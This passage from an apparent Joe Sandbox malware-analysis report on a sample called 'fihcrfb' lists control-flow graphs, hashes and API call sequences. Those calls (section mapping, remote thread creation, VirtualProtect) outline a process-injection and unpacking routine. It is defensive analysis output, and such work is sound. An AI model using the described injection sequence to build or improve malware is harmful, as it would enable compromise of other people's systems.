                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00418AE4
                                                                                                                                                                • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418AEF
                                                                                                                                                                • FindAtomW.KERNEL32(00000000), ref: 00418AF6
                                                                                                                                                                • SearchPathA.KERNEL32(0041A3E4,0041A3CC,0041A3B8,00000000,?,?), ref: 00418B1A
                                                                                                                                                                • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418B22
                                                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418B3A
                                                                                                                                                                • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418B61
                                                                                                                                                                • CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418B6D
                                                                                                                                                                • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418B83
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00418B89
                                                                                                                                                                • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418BCE
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418BDD
                                                                                                                                                                • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418BE6
                                                                                                                                                                • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BFB
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418C0C
                                                                                                                                                                • SetCommMask.KERNELBASE(00000000,00000000), ref: 00418C35
                                                                                                                                                                • GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418C4B
                                                                                                                                                                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418C7A
                                                                                                                                                                • GetComputerNameW.KERNEL32(?,?), ref: 00418C8E
                                                                                                                                                                • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418C94
                                                                                                                                                                • GetBinaryType.KERNEL32(0041A3F0,?), ref: 00418CA6
                                                                                                                                                                • PurgeComm.KERNEL32(00000000,00000000), ref: 00418CAE
                                                                                                                                                                • LoadLibraryA.KERNELBASE(0041A410), ref: 00418D22
                                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00418D57
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D7E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Console$CommFileObject$CompareExchangeInterlockedLengthNamePathSearch$AdjustmentAlarmAliasAliasesAtomAuditBinaryComputerConfigCopyCreateDefaultEnvironmentExesFindFocusInformationLibraryLoadMaskModeModuleMoveOutputPipePrivilegePurgeReadSingleStringsSystemTimeTypeUserWaitWrite
                                                                                                                                                                • String ID: k`$}$
                                                                                                                                                                • API String ID: 87775671-956986773
                                                                                                                                                                • Opcode ID: 48971c36b23ff85eb0f2744f6ec5e1cb4899774be3d2319cfe000faf9f975359
                                                                                                                                                                • Instruction ID: 14be8ff56781b1d00f5d5c610e1110d06a152b2d889af403ee48b93a4b1bf100
                                                                                                                                                                • Opcode Fuzzy Hash: 48971c36b23ff85eb0f2744f6ec5e1cb4899774be3d2319cfe000faf9f975359
                                                                                                                                                                • Instruction Fuzzy Hash: EDB1C671901224ABCB209B65EC54BDF7B79EF59310F00806EF609A31A1DB385E84CFAD

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 156 4014c4-4014f6 162 4014f9-40150d call 401240 156->162 167 401512-401513 162->167 168 401544-401545 167->168 169 401515-401528 167->169 171 401547 168->171 172 4015bd-4015d4 168->172 169->162 170 40152a-401535 169->170 170->167 174 401537-401543 170->174 175 401596-4015a6 171->175 176 401549-40154b 171->176 174->168 178 4015a8 175->178 176->178 179 40154d-40156d 176->179 181 4015e7-40160a call 401240 179->181 182 40156f 179->182 190 40160c 181->190 191 40160f-401614 181->191 185 401571 182->185 186 4015e2-4015e3 182->186 186->181 190->191 193 40161a-40162b 191->193 194 40193e-401946 191->194 197 401631-40165a 193->197 198 40193c 193->198 194->191 199 40194b-40198e call 401240 194->199 197->198 207 401660-401677 NtDuplicateObject 197->207 198->199 207->198 209 40167d-4016a1 NtCreateSection 207->209 211 4016a3-4016c4 NtMapViewOfSection 209->211 212 4016fd-401723 NtCreateSection 209->212 211->212 214 4016c6-4016e2 NtMapViewOfSection 211->214 212->198 215 401729-40172d 212->215 214->212 217 4016e4-4016fa 214->217 215->198 218 401733-401754 NtMapViewOfSection 215->218 217->212 218->198 219 40175a-401776 NtMapViewOfSection 218->219 219->198 221 40177c 219->221 221->198 224 40177c call 401781 221->224 224->198
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                                                                                                                • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                                                                                                                • Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                                                                                                                • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 225 4015d5-4015e4 227 4015f4 225->227 228 4015eb-4015f0 225->228 227->228 229 4015f7-40160a call 401240 227->229 228->229 232 40160c 229->232 233 40160f-401614 229->233 232->233 235 40161a-40162b 233->235 236 40193e-401946 233->236 239 401631-40165a 235->239 240 40193c 235->240 236->233 241 40194b-40198e call 401240 236->241 239->240 249 401660-401677 NtDuplicateObject 239->249 240->241 249->240 251 40167d-4016a1 NtCreateSection 249->251 253 4016a3-4016c4 NtMapViewOfSection 251->253 254 4016fd-401723 NtCreateSection 251->254 253->254 256 4016c6-4016e2 NtMapViewOfSection 253->256 254->240 257 401729-40172d 254->257 256->254 259 4016e4-4016fa 256->259 257->240 260 401733-401754 NtMapViewOfSection 257->260 259->254 260->240 261 40175a-401776 NtMapViewOfSection 260->261 261->240 263 40177c 261->263 263->240 266 40177c call 401781 263->266 266->240
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                                                                                                                • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                                                                                                                • Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                                                                                                                • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 267 4015df-4015e4 269 4015f4 267->269 270 4015eb-4015f0 267->270 269->270 271 4015f7-40160a call 401240 269->271 270->271 274 40160c 271->274 275 40160f-401614 271->275 274->275 277 40161a-40162b 275->277 278 40193e-401946 275->278 281 401631-40165a 277->281 282 40193c 277->282 278->275 283 40194b-40198e call 401240 278->283 281->282 291 401660-401677 NtDuplicateObject 281->291 282->283 291->282 293 40167d-4016a1 NtCreateSection 291->293 295 4016a3-4016c4 NtMapViewOfSection 293->295 296 4016fd-401723 NtCreateSection 293->296 295->296 298 4016c6-4016e2 NtMapViewOfSection 295->298 296->282 299 401729-40172d 296->299 298->296 301 4016e4-4016fa 298->301 299->282 302 401733-401754 NtMapViewOfSection 299->302 301->296 302->282 303 40175a-401776 NtMapViewOfSection 302->303 303->282 305 40177c 303->305 305->282 308 40177c call 401781 305->308 308->282
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                                                                                                                • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                                                                                                                • Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                                                                                                                • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 309 4015f2-4015f4 311 4015f7-40160a call 401240 309->311 312 4015eb-4015f0 309->312 315 40160c 311->315 316 40160f-401614 311->316 312->311 315->316 318 40161a-40162b 316->318 319 40193e-401946 316->319 322 401631-40165a 318->322 323 40193c 318->323 319->316 324 40194b-40198e call 401240 319->324 322->323 332 401660-401677 NtDuplicateObject 322->332 323->324 332->323 334 40167d-4016a1 NtCreateSection 332->334 336 4016a3-4016c4 NtMapViewOfSection 334->336 337 4016fd-401723 NtCreateSection 334->337 336->337 339 4016c6-4016e2 NtMapViewOfSection 336->339 337->323 340 401729-40172d 337->340 339->337 342 4016e4-4016fa 339->342 340->323 343 401733-401754 NtMapViewOfSection 340->343 342->337 343->323 344 40175a-401776 NtMapViewOfSection 343->344 344->323 346 40177c 344->346 346->323 349 40177c call 401781 346->349 349->323
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                                                                                                                • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                                                                                                                • Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                                                                                                                • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 350 4015e6-40160a call 401240 355 40160c 350->355 356 40160f-401614 350->356 355->356 358 40161a-40162b 356->358 359 40193e-401946 356->359 362 401631-40165a 358->362 363 40193c 358->363 359->356 364 40194b-40198e call 401240 359->364 362->363 372 401660-401677 NtDuplicateObject 362->372 363->364 372->363 374 40167d-4016a1 NtCreateSection 372->374 376 4016a3-4016c4 NtMapViewOfSection 374->376 377 4016fd-401723 NtCreateSection 374->377 376->377 379 4016c6-4016e2 NtMapViewOfSection 376->379 377->363 380 401729-40172d 377->380 379->377 382 4016e4-4016fa 379->382 380->363 383 401733-401754 NtMapViewOfSection 380->383 382->377 383->363 384 40175a-401776 NtMapViewOfSection 383->384 384->363 386 40177c 384->386 386->363 389 40177c call 401781 386->389 389->363
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000), ref: 0040169C
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                                                                                                                • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                                                                                                                • Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                                                                                                                • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 391 403043-403067 392 40319a-40319f 391->392 393 40306d-403085 391->393 393->392 394 40308b-40309c 393->394 395 40309e-4030a7 394->395 396 4030ac-4030ba 395->396 396->396 397 4030bc-4030c3 396->397 398 4030e5-4030ec 397->398 399 4030c5-4030e4 397->399 400 40310e-403111 398->400 401 4030ee-40310d 398->401 399->398 402 403113-403116 400->402 403 40311a 400->403 401->400 402->403 404 403118 402->404 403->395 405 40311c-403121 403->405 404->405 405->392 406 403123-403126 405->406 406->392 407 403128-403197 RtlCreateUserThread NtTerminateProcess 406->407 407->392
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1921587553-0
                                                                                                                                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                                                                                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                                • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 71 6c003c-6c0047 72 6c004c-6c0263 call 6c0a3f call 6c0e0f call 6c0d90 VirtualAlloc 71->72 73 6c0049 71->73 88 6c028b-6c0292 72->88 89 6c0265-6c0289 call 6c0a69 72->89 73->72 91 6c02a1-6c02b0 88->91 93 6c02ce-6c03c2 VirtualProtect call 6c0cce call 6c0ce7 89->93 91->93 94 6c02b2-6c02cc 91->94 100 6c03d1-6c03e0 93->100 94->91 101 6c0439-6c04b8 VirtualFree 100->101 102 6c03e2-6c0437 call 6c0ce7 100->102 103 6c04be-6c04cd 101->103 104 6c05f4-6c05fe 101->104 102->100 106 6c04d3-6c04dd 103->106 107 6c077f-6c0789 104->107 108 6c0604-6c060d 104->108 106->104 111 6c04e3-6c0505 106->111 112 6c078b-6c07a3 107->112 113 6c07a6-6c07b0 107->113 108->107 114 6c0613-6c0637 108->114 122 6c0517-6c0520 111->122 123 6c0507-6c0515 111->123 112->113 115 6c086e-6c08be LoadLibraryA 113->115 116 6c07b6-6c07cb 113->116 117 6c063e-6c0648 114->117 121 6c08c7-6c08f9 115->121 119 6c07d2-6c07d5 116->119 117->107 120 6c064e-6c065a 117->120 124 6c0824-6c0833 119->124 125 6c07d7-6c07e0 119->125 120->107 126 6c0660-6c066a 120->126 127 6c08fb-6c0901 121->127 128 6c0902-6c091d 121->128 129 6c0526-6c0547 122->129 123->129 133 6c0839-6c083c 124->133 130 6c07e4-6c0822 125->130 131 6c07e2 125->131 132 6c067a-6c0689 126->132 127->128 134 6c054d-6c0550 129->134 130->119 131->124 135 6c068f-6c06b2 132->135 136 6c0750-6c077a 132->136 133->115 137 6c083e-6c0847 133->137 139 6c0556-6c056b 134->139 140 6c05e0-6c05ef 134->140 141 6c06ef-6c06fc 135->141 142 6c06b4-6c06ed 135->142 136->117 143 6c0849 137->143 144 6c084b-6c086c 137->144 147 6c056d 139->147 148 6c056f-6c057a 139->148 140->106 145 6c06fe-6c0748 141->145 146 6c074b 141->146 142->141 143->115 144->133 145->146 146->132 147->140 151 6c057c-6c0599 148->151 152 6c059b-6c05bb 148->152 155 6c05bd-6c05db 151->155 152->155 155->134
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006C024D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c0000_fihcrfb.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                • Instruction ID: a16ad12f4b347be2b0c0f4aa935509a1366d3d88948981c0025655a100cedf30
                                                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                • Instruction Fuzzy Hash: F4525874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 390 418680-4187c0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00513D70), ref: 0041875F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041879C
                                                                                                                                                                • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004187BB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356256512.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_40b000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099061454-3916222277
                                                                                                                                                                • Opcode ID: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
                                                                                                                                                                • Instruction ID: 2155bd9b31e59c350c635bb378a89ddac8c1e1b9edbf8731bf03073443d6ecc1
                                                                                                                                                                • Opcode Fuzzy Hash: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
                                                                                                                                                                • Instruction Fuzzy Hash: CB315E18518780CAE301DB79FC257823F6AAB75744F04D1ACD54C8B3B1D7BA1618E36E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 408 710836-71084f 409 710851-710853 408->409 410 710855 409->410 411 71085a-710866 CreateToolhelp32Snapshot 409->411 410->411 412 710876-710883 Module32First 411->412 413 710868-71086e 411->413 414 710885-710886 call 7104f5 412->414 415 71088c-710894 412->415 413->412 419 710870-710874 413->419 420 71088b 414->420 419->409 419->412 420->415
                                                                                                                                                                APIs
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0071085E
                                                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 0071087E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_70d000_fihcrfb.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                • Instruction ID: d202ffc1bdfc86c7b4dbbd08686fccad44d69029437d9579aa45105526ac0560
                                                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                • Instruction Fuzzy Hash: 5DF06231100714AFD7203BBDA88DAAB76E8AF49725F100529E642914C0DAB8E8C546E1

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 421 6c0e0f-6c0e24 SetErrorMode * 2 422 6c0e2b-6c0e2c 421->422 423 6c0e26 421->423 423->422
                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,006C0223,?,?), ref: 006C0E19
                                                                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,006C0223,?,?), ref: 006C0E1E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c0000_fihcrfb.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                • Instruction ID: 4685c5a770edda50dbe0b2dc837f552568978304271461a35dbeccacd63f79b3
                                                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                • Instruction Fuzzy Hash: 97D01231145129B7D7003A94DC0DBDD7B1CDF09B62F008411FB0DD9180C770994046E5

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 424 401991-4019ed call 401240 Sleep 436 4019f3-4019f5 424->436 437 4019ee call 4014c4 424->437 438 401a04-401a52 call 401240 436->438 439 4019f7-4019ff call 4015b7 436->439 437->436 439->438
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.2356171732.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_fihcrfb.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                                                                • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                                                                                                                • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                                                                • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 453 4019a9-4019ed call 401240 Sleep 465 4019f3-4019f5 453->465 466 4019ee call 4014c4 453->466 467 401a04-401a52 call 401240 465->467 468 4019f7-4019ff call 4015b7 465->468 466->465 468->467
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                                                Memory Dump Source
